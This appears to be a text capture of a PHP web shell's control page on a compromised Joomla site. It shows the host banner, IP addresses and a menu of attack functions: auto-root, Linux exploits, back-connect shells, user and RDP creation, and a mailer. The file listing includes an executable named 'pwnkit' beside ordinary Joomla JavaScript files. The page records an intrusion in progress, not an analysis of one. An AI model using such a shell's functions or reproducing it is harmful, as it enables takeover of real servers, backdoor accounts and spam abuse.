Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
media /
com_icagenda /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
420
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
Chart.js
107.04
KB
-rw----r--
Chart.min.js
50.87
KB
-rw----r--
icagenda.js
1.74
KB
-rw----r--
icdates.js
8.28
KB
-rw----r--
icform.js
1.68
KB
-rw----r--
icmap-front.js
1.11
KB
-rw----r--
icmap.js
6.29
KB
-rw----r--
index.html
44
B
-rw----r--
jquery.noconflict.js
20
B
-rw----r--
jquery.tipTip.js
6.9
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
template.js
1.31
KB
-rw----r--
timepicker.js
55.68
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template.js
/** * @package Joomla.Administrator * @subpackage Templates.isis * @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 3 or later; see LICENSE.txt * @since 3.0 */ (function($) { $(document).ready(function() { $('*[rel=tooltip]').tooltip() // Turn radios into btn-group $('.radio.btn-group label').addClass('btn'); $(".btn-group label:not(.active)").click(function() { var label = $(this); var input = $('#' + label.attr('for')); if (!input.prop('checked')) { label.closest('.btn-group').find("label").removeClass('active btn-success btn-danger btn-primary'); if (input.val() == '') { label.addClass('active btn-primary'); } else if (input.val() == 0) { label.addClass('active btn-danger'); } else { label.addClass('active btn-success'); } input.prop('checked', true); } }); $(".btn-group input[checked=checked]").each(function() { if ($(this).val() == '') { $("label[for=" + $(this).attr('id') + "]").addClass('active btn-primary'); } else if ($(this).val() == 0) { $("label[for=" + $(this).attr('id') + "]").addClass('active btn-danger'); } else { $("label[for=" + $(this).attr('id') + "]").addClass('active btn-success'); } }); }) })(jQuery);
Close